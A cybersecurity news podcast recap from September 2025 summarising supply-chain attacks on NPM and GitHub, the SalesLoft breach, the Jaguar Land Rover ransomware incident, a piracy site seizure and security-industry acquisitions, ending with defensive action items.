Good Morning Security Gang!
It’s Tuesday, September 9th, 2025, and welcome back to the CyberHub Podcast. Today’s show is all about supply chain chaos and M&A shakeups in our industry.
We’re digging into the massive NPM hijack of packages with billions of downloads, a GitHub Actions compromise dubbed GhostAction, fallout from SalesLoft’s GitHub breach, Jaguar Land Rover’s cyber struggles, piracy platforms getting seized, and two big acquisitions—Nozomi Networks and Observo AI.
Double espresso in hand, let’s get into it.
📦 NPM Supply Chain Attack Hits 2 Billion Downloads
The open-source ecosystem took a huge hit as attackers compromised debug and chalk, two foundational NPM packages with more than 2 billion downloads per month. Joining me was Neatsun Ziv, CEO of OX Security, to break it down. The attack began with a phishing email to a maintainer, disguised as a two-factor authentication prompt. Once inside NPM, attackers pushed a malicious package version without changing code. The payload stole environment variables—with a particular focus on crypto wallets—allowing attackers to siphon funds during transactions.
The real kicker? This wouldn’t have shown up in daily SBOM scans because the poisoned package was published just hours after the scan cycles. Only build-time monitoring or commit-gate validation would have caught it.
As Nitsan noted, “There’s no single strategy—you need dynamic defenses and runtime monitoring in the build pipeline.”
🛠 GitHub Workflows Compromised – GhostAction
Security firm GitGuardian uncovered a campaign where attackers injected a malicious workflow into the fast-UUID project. The workflow exfiltrated secrets, including a PyPi token, to an attacker-controlled server. The malicious commit was reverted quickly, but this shows how GitHub Actions can be weaponized against developers and enterprises alike. GitHub repos remain a prime target for attackers harvesting API keys, secrets, and credentials at scale.
🔑 SalesLoft GitHub Breach – Drift OAuth Fallout
SalesLoft confirmed attackers breached its GitHub account as early as March 2025, downloading code, adding rogue workflows, and creating guest accounts. This paved the way for the Drift OAuth token theft, now tied to more than 22 breached organizations including Google, TransUnion, and Cloudflare. Investigators say the campaign focused on stealing AWS keys, Snowflake tokens, and passwords.
As I said: “This wasn’t singular—it was systematic. And our defense approach has to be just as systematic.”
🚗 Jaguar Land Rover Cyberattack – Impacting UK Growth
Jaguar Land Rover is still reeling from its ransomware incident, with systems offline across manufacturing and retail. Some analysts even warned the outage could impact UK economic growth. I’ll be blunt: Europe already has some of the strictest regulations, yet here we are. Regulation alone won’t stop these attacks. Without resilience and disincentives for attackers, governments will continue to see critical industries disrupted.
⚽ Calcio Sports Piracy Platform Seized
Following the takedown of StreamEast, authorities seized Calcio, a Moldova-based piracy streaming platform with 120M annual visits. Over 80% of its traffic came from Italy, but users spanned Spain, the U.S., Germany, and France. Domains now redirect to the ACE “Watch Legally” portal.
💼 M&A News – Nozomi & SentinelOne
Mitsubishi Electric acquired Nozomi Networks for nearly $1B, its largest acquisition ever. Mitsubishi previously held a minority stake but now owns it outright.
SentinelOne will acquire Obsorvo AI, a California-based AI-native data pipeline startup, for $225M cash. This follows SentinelOne’s milestone of surpassing $1B ARR, bolstering its DevOps and security data pipeline offerings.
🧠 James Azar’s CISO Take
What struck me most about today's discussion with Neatsun is how the NPM attack used the promise of better security - two-factor authentication - as the attack vector itself. This level of sophistication in social engineering, combined with AI-enhanced phishing capabilities, shows we're dealing with adversaries who understand not just our technical infrastructure but our security mindset. The fact that this attack could only be detected through commit-gate scanning, not traditional daily SBOM scans, reveals a massive blind spot in how most organizations approach supply chain security. We're not just dealing with individual incidents anymore - these are systematic, coordinated campaigns designed to harvest credentials and establish persistent access across entire ecosystems.
The broader lesson here is that our defense strategies need to evolve from reactive scanning to proactive, real-time monitoring of everything flowing through our development pipelines. Whether it's NPM packages, GitHub workflows, or the SalesLoft breach that started in March and cascaded through multiple organizations, we're seeing attackers operate with patience and systematic methodology that requires equally systematic defensive approaches. And frankly, while Europe continues to pile on regulations (which I find absolutely disgusting), the real solution isn't more bureaucracy - it's making attacks economically unviable while building resilient systems that can detect and respond to these sophisticated campaigns in real-time.
The final takeaway is that scale matters in cyber resilience. Jaguar Land Rover’s disruption highlights how fragile economies can be when a single company outage ripples outward. On the flip side, we’re seeing consolidation and investment in resilience - Mitsubishi and SentinelOne are betting billions on OT security and AI-native pipelines. If attackers are systematic, our defenses and industry strategies must be systematic too.
✅ Action Items
📦 Lock package versions where possible; generate SBOMs at build-time, not just daily.
🔐 Monitor GitHub Actions workflows for unauthorized changes.
🔑 Rotate OAuth, AWS, and Snowflake credentials tied to third-party apps.
🚗 Separate IT/OT systems in manufacturing to reduce ransomware blast radius.
📊 Audit supply chain risk beyond tier-1 vendors—track fourth-party dependencies.
⚽ Watch piracy enforcement trends if your org touches sports/media rights.
💼 Track M&A trends in OT and AI security for potential consolidation impacts.
